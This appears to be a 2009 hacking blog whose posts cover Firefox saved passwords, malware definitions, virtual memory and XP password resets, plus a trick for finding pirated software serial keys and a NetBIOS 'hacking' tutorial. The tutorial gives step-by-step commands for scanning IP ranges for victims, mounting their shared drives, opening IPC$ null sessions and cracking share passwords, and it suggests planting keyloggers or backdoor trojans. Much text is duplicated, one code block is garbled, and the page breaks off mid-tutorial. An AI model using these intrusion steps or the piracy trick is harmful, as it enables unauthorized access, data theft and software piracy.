Saturday, February 21, 2009
HACK PASSWORD FROM FIREFOX 3.0
Whenever you log in to a website using your username and password, you'll be prompted by Firefox 3.0 whether you'd like Firefox to remember this password.If you click on Remember, the next time you visit the website, it'll automatically enter the username and password for your convenience.Now, back to the topic. Let's say you saved your G Mail password in Firefox. After months or years gone by and you don't remember the password you set for my G Mail. You started to panic and desperately need to get back your G Mail password.Don't worry, here's how you can find the hidden GMail password in Firefox.Firefox 3.0 is much better than Internet Explorer in terms of managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third party tools to reveal the passwords hidden under asterisks. As for Firefox 3.0, you can access remembered passwords with a few clicks.To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new column with password will appear
Friday, February 20, 2009
ALL ABOUT TROJAN,VIRUS,WORM,SPYWARE,LOGIC BOMB
Trojan :
A Trojan is not a computer virus in the sense that it doesn't get into
your system and self-replicate. The Trojan derives its name from
the ancient Greek story of the Trojan Horse, where a group of
warriors invades a city by hiding within a giant wooden horse. The
residents of the city thought the horse to be a gift, never knowing
what was hidden inside, so they rolled the horse in bringing their
enemy within the city walls with it. The Greek Trojan horse
appeared to be something that it was not, just as the computer
Trojan is. A computer Trojan is software that appears to function in
a certain way, when in reality it performs another action. A Trojan is
not always harmful and damaging to your system, but it can open a
back door for hackers to get into your computer and cause damage
or retrieve information.It is a program which does an unauthorized
function, hidden inside an authorized program. It does something other
than what it claims to do, usually something malicious
and it is intended by the author to do whatever it does. If it's not
intentional, its called a 'bug' or, in some cases, a feature :) Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
Trojans.
Virus:
Computer Viruses have been around since the early 1980's.
A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".
Because every anti virus updates their database after the virus come to
existence.
Worm:
Made famous by Robert Morris, Jr. , worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems.
Computer Worms are like a virus in the fact that they do self-replicate
themselves within your computer system. However, a computer worm
does not have to attach itself to a program in your system like a computer
virus does in order to function. Also, unlike a computer virus that generally corrupts
and modifies files on your computer to cause damage, a computer worm
generally localizes its damage to the computer network. Computer worms
can often spread via email such as the SoBig and MyDoom worms did
(from 2003 and 2004 respectively).They are self contained and use the networks
to spread, in much the same way viruses use files to spread.
Spyware:
software that covertly gathers user information through the user's Internet
connection without his or her knowledge, usually for advertising purposes.
Spyware applications are typically bundled as a hidden component of freeware
or shareware programs that can be downloaded from the Internet; however, it should
be noted that the majority of shareware and freeware applications do not come with
spyware. Once installed, the spyware monitors user activity on the Internet and
transmits that information in the background to someone else. Spyware can also
gather information about e-mail addresses and even passwords and credit card numbers.
Aside from the questions of ethics and privacy, spyware steals from the user by using
the computer's memory resources and also by eating bandwidth as it sends information
back to the spyware's home base via the user's Internet connection. Because spyware
is using memory and system resources, the applications running in the background can
lead to system crashes or general system instability.Because spyware exists as
independent executable programs, they have the ability to monitor keystrokes, scan
files on the hard drive, snoop other applications, such as chat programs or word
processors, install other spyware programs, read cookies, change the default home
page on the Web browser, consistently relaying this information back to the spyware
author who will either use it for advertising/marketing purposes or sell the information
to another party.
Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.
While different in the functions they perform, Viruses, Trojans, Worms and
Spyware are all damaging to your computer. It is most important
you have proper computer protection software in place
that will protect you from these things so they cannot get into your computer
and cause damage.
A Trojan is not a computer virus in the sense that it doesn't get into
your system and self-replicate. The Trojan derives its name from
the ancient Greek story of the Trojan Horse, where a group of
warriors invades a city by hiding within a giant wooden horse. The
residents of the city thought the horse to be a gift, never knowing
what was hidden inside, so they rolled the horse in bringing their
enemy within the city walls with it. The Greek Trojan horse
appeared to be something that it was not, just as the computer
Trojan is. A computer Trojan is software that appears to function in
a certain way, when in reality it performs another action. A Trojan is
not always harmful and damaging to your system, but it can open a
back door for hackers to get into your computer and cause damage
or retrieve information.It is a program which does an unauthorized
function, hidden inside an authorized program. It does something other
than what it claims to do, usually something malicious
and it is intended by the author to do whatever it does. If it's not
intentional, its called a 'bug' or, in some cases, a feature :) Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
Trojans.
Virus:
Computer Viruses have been around since the early 1980's.
A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".
Because every anti virus updates their database after the virus come to
existence.
Worm:
Made famous by Robert Morris, Jr. , worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems.
Computer Worms are like a virus in the fact that they do self-replicate
themselves within your computer system. However, a computer worm
does not have to attach itself to a program in your system like a computer
virus does in order to function. Also, unlike a computer virus that generally corrupts
and modifies files on your computer to cause damage, a computer worm
generally localizes its damage to the computer network. Computer worms
can often spread via email such as the SoBig and MyDoom worms did
(from 2003 and 2004 respectively).They are self contained and use the networks
to spread, in much the same way viruses use files to spread.
Spyware:
software that covertly gathers user information through the user's Internet
connection without his or her knowledge, usually for advertising purposes.
Spyware applications are typically bundled as a hidden component of freeware
or shareware programs that can be downloaded from the Internet; however, it should
be noted that the majority of shareware and freeware applications do not come with
spyware. Once installed, the spyware monitors user activity on the Internet and
transmits that information in the background to someone else. Spyware can also
gather information about e-mail addresses and even passwords and credit card numbers.
Aside from the questions of ethics and privacy, spyware steals from the user by using
the computer's memory resources and also by eating bandwidth as it sends information
back to the spyware's home base via the user's Internet connection. Because spyware
is using memory and system resources, the applications running in the background can
lead to system crashes or general system instability.Because spyware exists as
independent executable programs, they have the ability to monitor keystrokes, scan
files on the hard drive, snoop other applications, such as chat programs or word
processors, install other spyware programs, read cookies, change the default home
page on the Web browser, consistently relaying this information back to the spyware
author who will either use it for advertising/marketing purposes or sell the information
to another party.
Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.
While different in the functions they perform, Viruses, Trojans, Worms and
Spyware are all damaging to your computer. It is most important
you have proper computer protection software in place
that will protect you from these things so they cannot get into your computer
and cause damage.
VIRTUAL MEMORY
VIRTUAL MEMORY AND HOW MUCH VIRTUAL MEMORY YOU NEED FOR YOUR SYSTEM.
Today application is getting bigger and bigger. Therefore, it requires a bigger system memory in order for the system to hold the application data, instruction, and thread and to load it. The system needs to copy the application data from the HDD into the system memory in order for it to process and execute the data. Once the memory gets filled up with data, the system will stop loading the program. In this case, users need to add more memory onto their system to support that intense application. However, adding more system memory costs the money and the normal user only needs to run the the intense application that requires the memory only for one or two days. Therefore, virtual memory is introduced to solve that type of problem.
There are two types of memory, which are as follows:
System Memory :- System memory is a memory that is used to store the application data and instruction in order for the system to process and execute that application data and instruction. When you install the memory sticks to increase the system RAM, you are adding more system memory. System Memory can be known as either the physical memory or the main memory.
Virtual Memory :- Virtual Memory is a memory that uses a portion of HDD space as the memory to store the application data and instruction that the system deemed it doesn't need to process for now. Virtual Memory can be known as the logical memory, and it controls by the Operating System, which is Microsoft Windows. Adding the Virtual Memory can be done in system configuration.
Virtual Memory is a HDD space that uses some portion of it as the memory. It is used to store application data and instruction that is currently not needed to be process by the system.
During the program loading process, the system will copy the application data and its instruction from the HDD into the main memory (system memory). Therefore the system can use its resources such as CPU to process and execute it. Once the system memory gets filled up, the system will start moving some of the data and instruction that don't need to process anymore into the Virtual Memory until those data and instruction need to process again. So the system can call the next application data and instruction and copy it into the main memory in order for the system to process the rest and load the program. When the data and instruction that is in the Virtual Memory needs to process again, the system will first check the main memory for its space. If there is space, it will simply swap those into the main memory. If there are not any space left for the main memory, the system will first check the main memory and move any data and instructions that doesn't need to be process into the Virtual Memory. And then swap the data and instruction that need to be process by the system from the Virtual Memory into the main memory.
Having too low of Virtual Memory size or large Virtual Memory size (meaning the size that is above double of the system memory) is not a good idea. If you set the Virtual Memory too low, then the OS will keep issuing an error message that states either Not enough memory or Virtual too low. This is because some portion of the system memory are used to store the OS Kernel, and it requires to be remain in the main memory all the time. Therefore the system needs to have a space to store the not currently needed process data and instruction when the main memory get filled up. If you set the Virtual Memory size too large to support the intensive application, it is also not a good idea. Because it will create the performance lagging, and even it will take the HDD free space. The system needs to transfer the application data and instruction back from the Virtual Memory to the System Memory. Therefore, that is not a good idea. The ideal size for the Virtual Memory is the default size of Virtual Memory, and it should not be exceed the value of the triple size of system memory.
To determine how much virtual memory you need, since the user's system contains the different amount of RAM, it is based on the system. By default, the OS will set the appropriate size for Virtual Memory. The default and appropriate size of Virtual Memory is:
CODE
* 1.5 =
.
For example, if your system contains 256 MB of RAM, you should set 384 MB for Virtual Memory.
CODE
256 MB of RAM (Main Memory) * 1.5 = 384 MB for Virtual Memory
If you would like to determine how much the Virtual Memory is for your system and/or would like to configure and add more virtual memory, follow the procedure that is shown below. The following procedure is based on windows XP Professional.
1-1) Go to right-click My Computer and choose Properties
1-2) In the System Properties dialog box, go to Advanced tab
1-3) Click Settings button that is from the Performance frame
1-4) Once the Performance Options shows up on the screen, go to Advanced tab
1-5) Under the Advanced tab, click the Change button from the Virtual Memory frame to access to the Virtual Memory setting
Then the Virtual Memory dialog box appears on the screen. In there, you are able to check how much the Virtual Memory you set. If you would like to modify the size of Virtual Memory, follow the procedure that is shown below.
2-1) In there, select the drive letter that is used to install the Operating System
2-2) Choose the option that says, "Custom Size:"
Once you choose that option, the setting for Initial Size and Maximum Size become available for you to set. Initial Size (MB) means the actual size of Virtual Memory, and Maximum Size (MB) means the maximum size of Virtual Memory that is allowed to use.
Let's say if your system contains 512 MB of RAM, then the ideal setting for the Virtual Memory is as follows:
CODE
Initial Size (MB): 768
Maximum Size (MB): 1500
Once you are happy with that Virtual Memory size, click the Set button from Paging file size for selected drive to apply the setting for the Virtual Memory size. Then click the OK button to apply the setting.
That's where you can manage and configure for the size of Virtual Memory.
To maintain the good overall system performance, you should be using the default size of actual size for Virtual Memory and the triple the value of the size of the main memory for the maximum size of Virtual Memory. If you find that main memory plus virtual memory is not big enough to load the intensive application, then you will need to add more main memory onto your system.
Today application is getting bigger and bigger. Therefore, it requires a bigger system memory in order for the system to hold the application data, instruction, and thread and to load it. The system needs to copy the application data from the HDD into the system memory in order for it to process and execute the data. Once the memory gets filled up with data, the system will stop loading the program. In this case, users need to add more memory onto their system to support that intense application. However, adding more system memory costs the money and the normal user only needs to run the the intense application that requires the memory only for one or two days. Therefore, virtual memory is introduced to solve that type of problem.
There are two types of memory, which are as follows:
System Memory :- System memory is a memory that is used to store the application data and instruction in order for the system to process and execute that application data and instruction. When you install the memory sticks to increase the system RAM, you are adding more system memory. System Memory can be known as either the physical memory or the main memory.
Virtual Memory :- Virtual Memory is a memory that uses a portion of HDD space as the memory to store the application data and instruction that the system deemed it doesn't need to process for now. Virtual Memory can be known as the logical memory, and it controls by the Operating System, which is Microsoft Windows. Adding the Virtual Memory can be done in system configuration.
Virtual Memory is a HDD space that uses some portion of it as the memory. It is used to store application data and instruction that is currently not needed to be process by the system.
During the program loading process, the system will copy the application data and its instruction from the HDD into the main memory (system memory). Therefore the system can use its resources such as CPU to process and execute it. Once the system memory gets filled up, the system will start moving some of the data and instruction that don't need to process anymore into the Virtual Memory until those data and instruction need to process again. So the system can call the next application data and instruction and copy it into the main memory in order for the system to process the rest and load the program. When the data and instruction that is in the Virtual Memory needs to process again, the system will first check the main memory for its space. If there is space, it will simply swap those into the main memory. If there are not any space left for the main memory, the system will first check the main memory and move any data and instructions that doesn't need to be process into the Virtual Memory. And then swap the data and instruction that need to be process by the system from the Virtual Memory into the main memory.
Having too low of Virtual Memory size or large Virtual Memory size (meaning the size that is above double of the system memory) is not a good idea. If you set the Virtual Memory too low, then the OS will keep issuing an error message that states either Not enough memory or Virtual too low. This is because some portion of the system memory are used to store the OS Kernel, and it requires to be remain in the main memory all the time. Therefore the system needs to have a space to store the not currently needed process data and instruction when the main memory get filled up. If you set the Virtual Memory size too large to support the intensive application, it is also not a good idea. Because it will create the performance lagging, and even it will take the HDD free space. The system needs to transfer the application data and instruction back from the Virtual Memory to the System Memory. Therefore, that is not a good idea. The ideal size for the Virtual Memory is the default size of Virtual Memory, and it should not be exceed the value of the triple size of system memory.
To determine how much virtual memory you need, since the user's system contains the different amount of RAM, it is based on the system. By default, the OS will set the appropriate size for Virtual Memory. The default and appropriate size of Virtual Memory is:
CODE
.
For example, if your system contains 256 MB of RAM, you should set 384 MB for Virtual Memory.
CODE
256 MB of RAM (Main Memory) * 1.5 = 384 MB for Virtual Memory
If you would like to determine how much the Virtual Memory is for your system and/or would like to configure and add more virtual memory, follow the procedure that is shown below. The following procedure is based on windows XP Professional.
1-1) Go to right-click My Computer and choose Properties
1-2) In the System Properties dialog box, go to Advanced tab
1-3) Click Settings button that is from the Performance frame
1-4) Once the Performance Options shows up on the screen, go to Advanced tab
1-5) Under the Advanced tab, click the Change button from the Virtual Memory frame to access to the Virtual Memory setting
Then the Virtual Memory dialog box appears on the screen. In there, you are able to check how much the Virtual Memory you set. If you would like to modify the size of Virtual Memory, follow the procedure that is shown below.
2-1) In there, select the drive letter that is used to install the Operating System
2-2) Choose the option that says, "Custom Size:"
Once you choose that option, the setting for Initial Size and Maximum Size become available for you to set. Initial Size (MB) means the actual size of Virtual Memory, and Maximum Size (MB) means the maximum size of Virtual Memory that is allowed to use.
Let's say if your system contains 512 MB of RAM, then the ideal setting for the Virtual Memory is as follows:
CODE
Initial Size (MB): 768
Maximum Size (MB): 1500
Once you are happy with that Virtual Memory size, click the Set button from Paging file size for selected drive to apply the setting for the Virtual Memory size. Then click the OK button to apply the setting.
That's where you can manage and configure for the size of Virtual Memory.
To maintain the good overall system performance, you should be using the default size of actual size for Virtual Memory and the triple the value of the size of the main memory for the maximum size of Virtual Memory. If you find that main memory plus virtual memory is not big enough to load the intensive application, then you will need to add more main memory onto your system.
GET THE SERIAL NUMBER YOU NEED !
1. Go to Google.
2. In the search field type: "Product name" 94FBR
3. Where, "Product Name" is the name of the item you want to find the serial number for.
4. And then there you go - the serial number you needed.
HOW DOES THIS WORK?
Quite simple really. 94FBR is part of cd key of many software distributed .
By searching for the product name and 94fbr, you guarantee get two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number,you guarantee that any page being returned is a serial number list page.
See these example searches:
"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero 8" 94FBR
"Windows vista" 94FBR
2. In the search field type: "Product name" 94FBR
3. Where, "Product Name" is the name of the item you want to find the serial number for.
4. And then there you go - the serial number you needed.
HOW DOES THIS WORK?
Quite simple really. 94FBR is part of cd key of many software distributed .
By searching for the product name and 94fbr, you guarantee get two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number,you guarantee that any page being returned is a serial number list page.
See these example searches:
"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero 8" 94FBR
"Windows vista" 94FBR
Thursday, February 19, 2009
CHANGE THE PASSWORD XP
1.FIRST GO TO START BUTTON.
2.THEN GO TO RUN .
3.RUN CMD .
4.FIRST RUN NET USER COMMAND TO SEE WHICH ARE THE USER IN YOUR SYSTEM.
5.THEN RUN NET USER "USER NAME " "PASSWORD" WITH OUT DOUBLE QUOTES WHICH U WANT TO CHANGE.
6.THEN IT DISPLAY THE COMMAND COMPLETED SUCCESSFULLY.
7.AND YOU HACK THE XP BY CHANGING.
2.THEN GO TO RUN .
3.RUN CMD .
4.FIRST RUN NET USER COMMAND TO SEE WHICH ARE THE USER IN YOUR SYSTEM.
5.THEN RUN NET USER "USER NAME " "PASSWORD" WITH OUT DOUBLE QUOTES WHICH U WANT TO CHANGE.
6.THEN IT DISPLAY THE COMMAND COMPLETED SUCCESSFULLY.
7.AND YOU HACK THE XP BY CHANGING.
NETBIOS HACKING
Decided to put this here instead of windows because it really is for beginners.
NETBIOS BASED HACKING TUTORIAL BY PIYUSH PRAKASH PUJARI
gkverma@msn.com
Preface
Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack ?
Types of attacks
Searching for a victim
Lets Hack - Part 1 Remotely reading/writing to a victim's computer
Cracking "Share "passwords
Using IPC$ to hack Windows NT
Penetrating in to the victim's computer
Lets Hack - Part 2 Denial of service attack
How to protect yourself
_______________________________________________________________________________
______________________________
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
________________________________________________________________________________
______________________________
THE NBTSTAT COMMAND
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.
This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command
NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
If you want to get to know more about the ip address and ports click here
________________________________________________________________________________
____
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
________________________________________________________________________________
____________________________
TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
________________________________________________________________________________
_____________________________
Searching for a victim
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
________________________________________________________________________________
____________________________
Lets Hack -Part 1 Remotely reading/writing to a victim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
If you would like to know more about ip address click here . If you don't the ip address where File and Printer Sharing is enabled read "Searching for a victim"
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -
Windows 95
Windows 98
Windows Me
GO TO CONTENTS
________________________________________________________________________________
______________________________
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
GO TO CONTENTS
________________________________________________________________________________
______________________________
Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Lets Hack - Part 2 Denial of service attack
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1
Vulnerability 2
Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
________________________________________________________________________________
______________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let the windows update itself.
________________________________________________________________________________
______________________________
The above tutorial has been written by PIYUSH PRAKASH PUJARI
If you need more help please feel free to email me PIYUSHPUJARI123@GMAIL.com
NETBIOS BASED HACKING TUTORIAL BY PIYUSH PRAKASH PUJARI
gkverma@msn.com
Preface
Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack ?
Types of attacks
Searching for a victim
Lets Hack - Part 1 Remotely reading/writing to a victim's computer
Cracking "Share "passwords
Using IPC$ to hack Windows NT
Penetrating in to the victim's computer
Lets Hack - Part 2 Denial of service attack
How to protect yourself
_______________________________________________________________________________
______________________________
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
________________________________________________________________________________
______________________________
THE NBTSTAT COMMAND
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.
This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command
NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
If you want to get to know more about the ip address and ports click here
________________________________________________________________________________
____
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
________________________________________________________________________________
____________________________
TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
________________________________________________________________________________
_____________________________
Searching for a victim
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
________________________________________________________________________________
____________________________
Lets Hack -Part 1 Remotely reading/writing to a victim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
If you would like to know more about ip address click here . If you don't the ip address where File and Printer Sharing is enabled read "Searching for a victim"
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
